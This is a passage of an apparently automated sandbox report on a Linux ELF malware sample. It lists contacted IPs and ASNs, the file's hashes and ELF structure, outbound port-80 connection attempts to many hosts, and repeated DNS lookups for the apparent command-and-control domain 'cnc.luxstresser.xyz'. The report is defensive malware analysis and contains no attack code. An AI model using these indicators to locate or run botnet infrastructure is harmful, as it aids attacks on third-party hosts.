              86.240.156.164
              		unknownFrance
              		3215FranceTelecom-OrangeFRfalse
              41.94.163.82
              		unknownMozambique
              		327700MoRENetMZfalse
              41.106.43.128
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              205.175.95.64
              		unknownUnited States
              		14630INVESCOUSfalse
              197.217.236.118
              		unknownAngola
              		11259ANGOLATELECOMAOfalse
              161.164.218.240
              		unknownUnited States
              		10695WAL-MARTUSfalse
              130.205.38.203
              		unknownUnited States
              		13124IBGCBGfalse
              178.218.134.59
              		unknownRomania
              		50835IFUTUREROfalse
              208.67.236.151
              		unknownUnited States
              		40009BITGRAVITYUSfalse
              160.100.160.201
              		unknownUnited Kingdom
              		715WOODYNET-2USfalse
              156.254.119.6
              		unknownSeychelles
              		63981NTDKL-HK43FAIATower183ElectricRoadNorthPointHofalse
              73.152.94.189
              		unknownUnited States
              		7922COMCAST-7922USfalse
              162.115.86.71
              		unknownUnited States
              		12079CELLCO-PARTUSfalse
              175.108.35.207
              		unknownJapan2516KDDIKDDICORPORATIONJPfalse
              217.22.110.121
              		unknownSpain
              		15711IBERDROLABilbaoESfalse
              41.68.48.244
              		unknownEgypt
              		24835RAYA-ASEGfalse
              24.33.86.89
              		unknownUnited States
              		10796TWC-10796-MIDWESTUSfalse
              161.46.177.71
              		unknownUnited States
              		1252UNMC-ASUSfalse
              60.19.228.233
              		unknownChina
              		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
              170.218.220.32
              		unknownUnited States
              		11740PROGRESSIVE-ASUSfalse
              197.191.38.219
              		unknownGhana
              		37140zain-asGHfalse
              133.0.206.81
              		unknownJapan385AFCONC-BLOCK1-ASUSfalse
              41.145.207.246
              		unknownSouth Africa
              		5713SAIX-NETZAfalse
              188.173.82.208
              		unknownRomania
              		48161NG-ASSosBucuresti-Ploiestinr42-44ROfalse
              197.214.155.167
              		unknownCongo
              		37550airtelcgCGfalse
              197.73.132.136
              		unknownSouth Africa
              		16637MTNNS-ASZAfalse
              205.245.72.43
              		unknownUnited States
              		30385PERDUE-FARMS-INCORPORATEDUSfalse
              197.143.201.73
              		unknownAlgeria
              		36891ICOSNET-ASDZfalse
              27.21.41.20
              		unknownChina
              		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
              19.112.97.205
              		unknownUnited States
              		3MIT-GATEWAYSUSfalse
              87.222.194.121
              		unknownSpain
              		12479UNI2-ASESfalse
              217.156.198.183
              		unknownUnited Kingdom
              		3549LVLT-3549USfalse
              206.114.194.64
              		unknownUnited States
              		3561CENTURYLINK-LEGACY-SAVVISUSfalse
              190.74.207.8
              		unknownVenezuela
              		8048CANTVServiciosVenezuelaVEfalse
              179.101.227.73
              		unknownBrazil
              		27699TELEFONICABRASILSABRfalse
              34.0.71.110
              		unknownUnited States
              		2686ATGS-MMD-ASUSfalse
              45.141.18.24
              		unknownNetherlands
              		34562PROIP-ASIncaseofproblemscontactnocproipnetNLfalse
              156.241.11.81
              		unknownSeychelles
              		135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
              162.237.115.197
              		unknownUnited States
              		7018ATT-INTERNET4USfalse
              197.234.167.159
              		unknownSouth Africa
              		37315CipherWaveZAfalse
              168.11.235.136
              		unknownUnited States
              		3480PEACHNET-AS2USfalse
              60.53.67.215
              		unknownMalaysia
              		4788TMNET-AS-APTMNetInternetServiceProviderMYfalse
              47.228.85.29
              		unknownUnited States
              		7224AMAZON-ASUSfalse
              66.81.23.243
              		unknownUnited States
              		14265US-TELEPACIFICUSfalse
              41.77.181.142
              		unknownAlgeria
              		36974AFNET-ASCIfalse
              133.9.169.38
              		unknownJapan17956WASEDAWASEDAUniversityJPfalse
              73.105.58.29
              		unknownUnited States
              		7922COMCAST-7922USfalse
              152.116.148.10
              		unknownUnited States
              		2018TENET-1ZAfalse
              147.48.77.176
              		unknownUnited States
              		5180DNIC-ASBLK-05120-05376USfalse
              195.164.130.163
              		unknownPoland
              		204679OSEPLfalse
              27.236.188.140
              		unknownKorea Republic of
              		4766KIXS-AS-KRKoreaTelecomKRfalse
              41.25.211.135
              		unknownSouth Africa
              		36994Vodacom-VBZAfalse
              109.145.152.71
              		unknownUnited Kingdom
              		2856BT-UK-ASBTnetUKRegionalnetworkGBfalse
              107.128.43.13
              		unknownUnited States
              		7018ATT-INTERNET4USfalse
              191.92.238.169
              		unknownColombia
              		27831ColombiaMovilCOfalse
              8.129.155.155
              		unknownSingapore
              		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
              204.85.103.204
              		unknownUnited States
              		81NCRENUSfalse
              199.130.247.154
              		unknownUnited States
              		4152USDA-1USfalse
              156.192.115.130
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              76.12.107.141
              		unknownUnited States
              		20021LNH-INCUSfalse
              49.100.27.192
              		unknownJapan9605DOCOMONTTDOCOMOINCJPfalse
              152.83.207.143
              		unknownAustralia
              		6262CSIROCommonwealthScientificandIndustrialAUfalse
              153.246.205.122
              		unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
              85.211.188.113
              		unknownUnited Kingdom
              		9105TISCALI-UKTalkTalkCommunicationsLimitedGBfalse
              160.120.31.172
              		unknownCote D'ivoire
              		29571ORANGE-COTE-IVOIRECIfalse
              95.23.230.97
              		unknownSpain
              		12479UNI2-ASESfalse
              142.193.218.70
              		unknownCanada
              		13576SDNW-13576USfalse
              41.138.141.89
              		unknownMauritania
              		37541CHINGUITELMRfalse
              41.35.57.70
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              13.65.160.209
              		unknownUnited States
              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              146.211.32.105
              		unknownFinland
              		16086DNAFIfalse
              197.12.31.210
              		unknownTunisia
              		37703ATLAXTNfalse
              197.231.80.95
              		unknownGabon
              		37582ANINFGAfalse
              105.1.204.215
              		unknownSouth Africa
              		37168CELL-CZAfalse
              156.16.3.222
              		unknownunknown
              		29975VODACOM-ZAfalse
              47.152.237.217
              		unknownUnited States
              		5650FRONTIER-FRTRUSfalse
              197.104.77.51
              		unknownSouth Africa
              		37168CELL-CZAfalse
              8.159.102.86
              		unknownSingapore
              		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
              197.217.236.147
              		unknownAngola
              		11259ANGOLATELECOMAOfalse
              197.207.206.191
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              156.3.205.253
              		unknownUnited States
              		2920LACOEUSfalse
              39.123.64.75
              		unknownKorea Republic of
              		9318SKB-ASSKBroadbandCoLtdKRfalse
              197.235.33.63
              		unknownMozambique
              		37223VODACOM-MZfalse
              62.186.69.39
              		unknownEuropean Union
              		34456RIALCOM-ASRUfalse
              197.251.50.178
              		unknownSudan
              		37197SUDRENSDfalse
              41.69.166.172
              		unknownEgypt
              		24835RAYA-ASEGfalse
              169.108.126.83
              		unknownUnited States
              		37611AfrihostZAfalse
              82.51.56.243
              		unknownItaly
              		3269ASN-IBSNAZITfalse
              54.50.233.185
              		unknownUnited States
              		14618AMAZON-AESUSfalse

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              /var/cache/motd-news

              Download File
              Process:/usr/bin/cut
              File Type:ASCII text
              Category:dropped
              Size (bytes):191
              Entropy (8bit):4.515771857099866
              Encrypted:false
              SSDEEP:3:P2lnI+5MsqqzNLz+FRNScHUBfRau95++sZzR5woLB1Fh0VTGTl/X5kURn:OZ8uNLzDc0pR75+9Zz/woFmIT52URn
              MD5:DD514F892B5F93ED615D366E58AC58AF
              SHA1:BA75EDB3C2232CC260BC187F604DC8F25AA72C11
              SHA-256:F40D0DCE6E83DF74109FEF5E68E51CC255727783EEAE04C3E34677E23F7552CF
              SHA-512:9150BDE63F6C4850C5340D8877892B4D9BBF9EBDC98CDCF557A93FA304C1222CEE446418F5BE2ACCDBF38393778AFA5D4F3EDCB37A47BF57D3A4B2DEAD42A2D0
              Malicious:false
              Reputation:high, very likely benign file
              Preview: * Super-optimized for small spaces - read how we shrank the memory. footprint of MicroK8s to make it the smallest full K8s around... https://ubuntu.com/blog/microk8s-memory-optimisation.

              Static File Info

              General

              File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
              Entropy (8bit):6.4479363808902495
              TrID:
              • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
              • ELF Executable and Linkable format (generic) (4004/1) 49.84%
              File name:file1
              File size:66320
              MD5:c343f34198cdb0656394f0541c3b1880
              SHA1:481c79fcd0b01ef4c614624c1261faca18bdd49c
              SHA256:b89d919623f76162795f14a8dcf49159e102e7c7715ce3517ce66c88d7cea1e3
              SHA512:9c1ace5f9bdcb0a5fe57186af97bb3be9e0dc79e6db7c3de2e877111f3e0e653f06598a1ac7e5cd59642a999e8f5466c299d45ef5b2310e3d998b0549be77a12
              SSDEEP:1536:kk6qInEKyMk1k0k+QbUKO6OV9HArjhw5YcAlT/:N6qqEKyMJxNUH6OV9mjhwWN
              File Content Preview:.ELF....................d...4...........4. ...(.....................................................@...@...........Q.td............................U..S.......w....h........[]...$.............U......=@....t..5....$......$.......u........t....h.~..........

              Static ELF Info

              ELF header

              Class:ELF32
              Data:2's complement, little endian
              Version:1 (current)
              Machine:Intel 80386
              Version Number:0x1
              Type:EXEC (Executable file)
              OS/ABI:UNIX - System V
              ABI Version:0
              Entry Point Address:0x8048164
              Flags:0x0
              ELF Header Size:52
              Program Header Offset:52
              Program Header Size:32
              Number of Program Headers:3
              Section Header Offset:65920
              Section Header Size:40
              Number of Section Headers:10
              Header String Table Index:9

              Sections

              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
              NULL0x00x00x00x00x0000
              .initPROGBITS0x80480940x940x1c0x00x6AX001
              .textPROGBITS0x80480b00xb00xe7c60x00x6AX0016
              .finiPROGBITS0x80568760xe8760x170x00x6AX001
              .rodataPROGBITS0x80568a00xe8a00x16400x00x2A0032
              .ctorsPROGBITS0x80580000x100000x80x00x3WA004
              .dtorsPROGBITS0x80580080x100080x80x00x3WA004
              .dataPROGBITS0x80580200x100200x1200x00x3WA0032
              .bssNOBITS0x80581400x101400x8000x00x3WA0032
              .shstrtabSTRTAB0x00x101400x3e0x00x0001

              Program Segments

              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
              LOAD0x00x80480000x80480000xfee00xfee03.93700x5R E0x1000.init .text .fini .rodata
              LOAD0x100000x80580000x80580000x1400x9402.53650x6RW 0x1000.ctors .dtors .data .bss
              GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Feb 19, 2022 16:05:17.163872957 CET5281380192.168.2.2361.76.22.146
              Feb 19, 2022 16:05:17.163883924 CET5281380192.168.2.2323.228.252.146
              Feb 19, 2022 16:05:17.163897991 CET5281380192.168.2.23167.61.225.82
              Feb 19, 2022 16:05:17.163901091 CET5281380192.168.2.23196.7.75.56
              Feb 19, 2022 16:05:17.163917065 CET5281380192.168.2.23154.241.51.147
              Feb 19, 2022 16:05:17.163940907 CET5281380192.168.2.2323.29.188.234
              Feb 19, 2022 16:05:17.163949013 CET5281380192.168.2.23111.158.5.202
              Feb 19, 2022 16:05:17.163960934 CET5281380192.168.2.23218.122.10.122
              Feb 19, 2022 16:05:17.163964033 CET5281380192.168.2.23141.229.33.152
              Feb 19, 2022 16:05:17.163968086 CET5281380192.168.2.23104.167.221.9
              Feb 19, 2022 16:05:17.163963079 CET5281380192.168.2.2374.62.72.251
              Feb 19, 2022 16:05:17.163970947 CET5281380192.168.2.23179.71.83.72
              Feb 19, 2022 16:05:17.163976908 CET5281380192.168.2.23128.117.4.49
              Feb 19, 2022 16:05:17.163980007 CET5281380192.168.2.2332.222.200.14
              Feb 19, 2022 16:05:17.163989067 CET5281380192.168.2.235.153.241.51
              Feb 19, 2022 16:05:17.163990974 CET5281380192.168.2.2381.25.222.140
              Feb 19, 2022 16:05:17.164005995 CET5281380192.168.2.23180.213.193.141
              Feb 19, 2022 16:05:17.164016962 CET5281380192.168.2.23110.226.120.244
              Feb 19, 2022 16:05:17.164022923 CET5281380192.168.2.2354.210.7.11
              Feb 19, 2022 16:05:17.164026022 CET5281380192.168.2.23131.138.30.253
              Feb 19, 2022 16:05:17.164035082 CET5281380192.168.2.23170.217.232.94
              Feb 19, 2022 16:05:17.164043903 CET5281380192.168.2.2389.65.31.75
              Feb 19, 2022 16:05:17.164047956 CET5281380192.168.2.2332.82.143.80
              Feb 19, 2022 16:05:17.164052963 CET5281380192.168.2.2312.199.160.105
              Feb 19, 2022 16:05:17.164057016 CET5281380192.168.2.231.30.206.40
              Feb 19, 2022 16:05:17.164062977 CET5281380192.168.2.2313.55.109.90
              Feb 19, 2022 16:05:17.164069891 CET5281380192.168.2.2341.229.254.231
              Feb 19, 2022 16:05:17.164079905 CET5281380192.168.2.2384.183.153.128
              Feb 19, 2022 16:05:17.164086103 CET5281380192.168.2.23113.183.96.66
              Feb 19, 2022 16:05:17.164086103 CET5281380192.168.2.23139.67.227.25
              Feb 19, 2022 16:05:17.164094925 CET5281380192.168.2.2366.68.24.116
              Feb 19, 2022 16:05:17.164103985 CET5281380192.168.2.2325.234.111.0
              Feb 19, 2022 16:05:17.164103985 CET5281380192.168.2.23208.217.82.85
              Feb 19, 2022 16:05:17.164107084 CET5281380192.168.2.23195.96.81.94
              Feb 19, 2022 16:05:17.164120913 CET5281380192.168.2.2381.254.39.16
              Feb 19, 2022 16:05:17.164130926 CET5281380192.168.2.23203.214.61.184
              Feb 19, 2022 16:05:17.164132118 CET5281380192.168.2.2397.97.170.115
              Feb 19, 2022 16:05:17.164138079 CET5281380192.168.2.2341.175.187.12
              Feb 19, 2022 16:05:17.164155006 CET5281380192.168.2.23148.123.144.137
              Feb 19, 2022 16:05:17.164170980 CET5281380192.168.2.2375.201.151.117
              Feb 19, 2022 16:05:17.164176941 CET5281380192.168.2.23153.163.26.129
              Feb 19, 2022 16:05:17.164185047 CET5281380192.168.2.2334.100.244.30
              Feb 19, 2022 16:05:17.164185047 CET5281380192.168.2.23153.118.148.66
              Feb 19, 2022 16:05:17.164191008 CET5281380192.168.2.23149.234.204.59
              Feb 19, 2022 16:05:17.164195061 CET5281380192.168.2.23204.8.69.100
              Feb 19, 2022 16:05:17.164200068 CET5281380192.168.2.23161.243.172.243
              Feb 19, 2022 16:05:17.164205074 CET5281380192.168.2.23154.95.1.133
              Feb 19, 2022 16:05:17.164206028 CET5281380192.168.2.23133.45.63.154
              Feb 19, 2022 16:05:17.164216042 CET5281380192.168.2.23132.217.68.209
              Feb 19, 2022 16:05:17.164220095 CET5281380192.168.2.23109.124.239.109
              Feb 19, 2022 16:05:17.164223909 CET5281380192.168.2.23170.26.252.76
              Feb 19, 2022 16:05:17.164233923 CET5281380192.168.2.2352.36.210.234
              Feb 19, 2022 16:05:17.164235115 CET5281380192.168.2.2314.60.20.140
              Feb 19, 2022 16:05:17.164262056 CET5281380192.168.2.2398.196.19.248
              Feb 19, 2022 16:05:17.164267063 CET5281380192.168.2.23125.127.99.192
              Feb 19, 2022 16:05:17.164268970 CET5281380192.168.2.2378.83.176.230
              Feb 19, 2022 16:05:17.164272070 CET5281380192.168.2.23216.84.72.223
              Feb 19, 2022 16:05:17.164274931 CET5281380192.168.2.2341.33.166.236
              Feb 19, 2022 16:05:17.164275885 CET5281380192.168.2.2335.36.140.6
              Feb 19, 2022 16:05:17.164288044 CET5281380192.168.2.23160.229.128.28
              Feb 19, 2022 16:05:17.164289951 CET5281380192.168.2.2369.131.231.157
              Feb 19, 2022 16:05:17.164304972 CET5281380192.168.2.2370.61.102.41
              Feb 19, 2022 16:05:17.164303064 CET5281380192.168.2.23218.144.151.216
              Feb 19, 2022 16:05:17.164311886 CET5281380192.168.2.23150.141.184.218
              Feb 19, 2022 16:05:17.164328098 CET5281380192.168.2.2389.208.196.150
              Feb 19, 2022 16:05:17.164330006 CET5281380192.168.2.23210.115.168.44
              Feb 19, 2022 16:05:17.164341927 CET5281380192.168.2.2339.135.19.163
              Feb 19, 2022 16:05:17.164351940 CET5281380192.168.2.23195.225.239.234
              Feb 19, 2022 16:05:17.164356947 CET5281380192.168.2.23118.115.238.17
              Feb 19, 2022 16:05:17.164361000 CET5281380192.168.2.23122.208.55.204
              Feb 19, 2022 16:05:17.164371014 CET5281380192.168.2.2349.42.212.86
              Feb 19, 2022 16:05:17.164370060 CET5281380192.168.2.2331.243.170.109
              Feb 19, 2022 16:05:17.164376974 CET5281380192.168.2.23186.147.79.249
              Feb 19, 2022 16:05:17.164380074 CET5281380192.168.2.2314.174.150.106
              Feb 19, 2022 16:05:17.164383888 CET5281380192.168.2.2378.181.193.121
              Feb 19, 2022 16:05:17.164390087 CET5281380192.168.2.23192.158.161.111
              Feb 19, 2022 16:05:17.164392948 CET5281380192.168.2.23106.162.177.166
              Feb 19, 2022 16:05:17.164398909 CET5281380192.168.2.23144.228.160.247
              Feb 19, 2022 16:05:17.164400101 CET5281380192.168.2.23204.112.149.163
              Feb 19, 2022 16:05:17.164410114 CET5281380192.168.2.23102.126.23.192
              Feb 19, 2022 16:05:17.164413929 CET5281380192.168.2.23211.254.9.29
              Feb 19, 2022 16:05:17.164423943 CET5281380192.168.2.23120.197.16.52
              Feb 19, 2022 16:05:17.164433002 CET5281380192.168.2.23170.126.217.99
              Feb 19, 2022 16:05:17.164439917 CET5281380192.168.2.2363.158.34.51
              Feb 19, 2022 16:05:17.164446115 CET5281380192.168.2.23169.19.29.107
              Feb 19, 2022 16:05:17.164459944 CET5281380192.168.2.23139.180.101.47
              Feb 19, 2022 16:05:17.164463043 CET5281380192.168.2.2387.201.116.9
              Feb 19, 2022 16:05:17.164468050 CET5281380192.168.2.23129.196.194.82
              Feb 19, 2022 16:05:17.164477110 CET5281380192.168.2.23107.129.24.233
              Feb 19, 2022 16:05:17.164484024 CET5281380192.168.2.23223.59.115.249
              Feb 19, 2022 16:05:17.164485931 CET5281380192.168.2.2347.152.35.12
              Feb 19, 2022 16:05:17.164493084 CET5281380192.168.2.23168.144.86.145
              Feb 19, 2022 16:05:17.164503098 CET5281380192.168.2.2350.205.86.120
              Feb 19, 2022 16:05:17.164504051 CET5281380192.168.2.2399.21.203.17
              Feb 19, 2022 16:05:17.164506912 CET5281380192.168.2.2383.38.164.16
              Feb 19, 2022 16:05:17.164515972 CET5281380192.168.2.23157.253.191.143
              Feb 19, 2022 16:05:17.164515972 CET5281380192.168.2.23219.112.145.211
              Feb 19, 2022 16:05:17.164519072 CET5281380192.168.2.23182.216.14.111
              Feb 19, 2022 16:05:17.164520025 CET5281380192.168.2.23128.59.172.175
              Feb 19, 2022 16:05:17.164524078 CET5281380192.168.2.23132.24.150.218

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Feb 19, 2022 16:05:17.169208050 CET192.168.2.238.8.8.80x9083Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:17.188503027 CET192.168.2.238.8.8.80x9083Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:17.210741043 CET192.168.2.238.8.8.80x9083Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:17.232152939 CET192.168.2.238.8.8.80x9083Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:17.253582954 CET192.168.2.238.8.8.80x9083Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:28.277266979 CET192.168.2.238.8.8.80x7141Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:28.302047014 CET192.168.2.238.8.8.80x7141Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:28.322594881 CET192.168.2.238.8.8.80x7141Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:28.343832970 CET192.168.2.238.8.8.80x7141Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:28.362735033 CET192.168.2.238.8.8.80x7141Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:39.394556999 CET192.168.2.238.8.8.80x1533Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:39.416646957 CET192.168.2.238.8.8.80x1533Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:39.442404985 CET192.168.2.238.8.8.80x1533Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:39.463340998 CET192.168.2.238.8.8.80x1533Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:39.485575914 CET192.168.2.238.8.8.80x1533Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:50.518940926 CET192.168.2.238.8.8.80x2028Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:50.541299105 CET192.168.2.238.8.8.80x2028Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:50.561023951 CET192.168.2.238.8.8.80x2028Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:50.583645105 CET192.168.2.238.8.8.80x2028Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:50.602852106 CET192.168.2.238.8.8.80x2028Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:01.634738922 CET192.168.2.238.8.8.80xc8beStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:01.654905081 CET192.168.2.238.8.8.80xc8beStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:01.676611900 CET192.168.2.238.8.8.80xc8beStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:01.697312117 CET192.168.2.238.8.8.80xc8beStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:01.718451023 CET192.168.2.238.8.8.80xc8beStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:12.747715950 CET192.168.2.238.8.8.80x3c5eStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:12.768933058 CET192.168.2.238.8.8.80x3c5eStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:12.789164066 CET192.168.2.238.8.8.80x3c5eStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:12.813551903 CET192.168.2.238.8.8.80x3c5eStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:12.838599920 CET192.168.2.238.8.8.80x3c5eStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:23.868150949 CET192.168.2.238.8.8.80x71e1Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:23.890278101 CET192.168.2.238.8.8.80x71e1Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:23.909723043 CET192.168.2.238.8.8.80x71e1Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:23.932472944 CET192.168.2.238.8.8.80x71e1Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:23.956166029 CET192.168.2.238.8.8.80x71e1Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:34.984849930 CET192.168.2.238.8.8.80x679eStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:35.005362988 CET192.168.2.238.8.8.80x679eStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:35.027827024 CET192.168.2.238.8.8.80x679eStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:35.048996925 CET192.168.2.238.8.8.80x679eStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:35.071799040 CET192.168.2.238.8.8.80x679eStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:46.104168892 CET192.168.2.238.8.8.80xb4deStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:46.125423908 CET192.168.2.238.8.8.80xb4deStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:46.144278049 CET192.168.2.238.8.8.80xb4deStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:46.166584015 CET192.168.2.238.8.8.80xb4deStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:46.187721968 CET192.168.2.238.8.8.80xb4deStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:57.215707064 CET192.168.2.238.8.8.80xb5a1Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:57.238224030 CET192.168.2.238.8.8.80xb5a1Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:57.257270098 CET192.168.2.238.8.8.80xb5a1Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:57.276547909 CET192.168.2.238.8.8.80xb5a1Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:57.296091080 CET192.168.2.238.8.8.80xb5a1Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:07:08.325062037 CET192.168.2.238.8.8.80x7aaeStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:07:08.346443892 CET192.168.2.238.8.8.80x7aaeStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:07:08.366025925 CET192.168.2.238.8.8.80x7aaeStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:07:08.386859894 CET192.168.2.238.8.8.80x7aaeStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:07:08.408768892 CET192.168.2.238.8.8.80x7aaeStandard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:07:19.439989090 CET192.168.2.238.8.8.80xddb7Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:07:19.463567972 CET192.168.2.238.8.8.80xddb7Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:07:19.484330893 CET192.168.2.238.8.8.80xddb7Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:07:19.506373882 CET192.168.2.238.8.8.80xddb7Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)
              Feb 19, 2022 16:07:19.527707100 CET192.168.2.238.8.8.80xddb7Standard query (0)cnc.luxstresser.xyzA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Feb 19, 2022 16:05:17.188138962 CET8.8.8.8192.168.2.230x9083Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:17.210571051 CET8.8.8.8192.168.2.230x9083Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:17.231899023 CET8.8.8.8192.168.2.230x9083Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:17.253371954 CET8.8.8.8192.168.2.230x9083Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:17.272620916 CET8.8.8.8192.168.2.230x9083Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:28.299774885 CET8.8.8.8192.168.2.230x7141Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:28.322443008 CET8.8.8.8192.168.2.230x7141Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:28.343636036 CET8.8.8.8192.168.2.230x7141Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:28.362586021 CET8.8.8.8192.168.2.230x7141Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:28.384361982 CET8.8.8.8192.168.2.230x7141Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
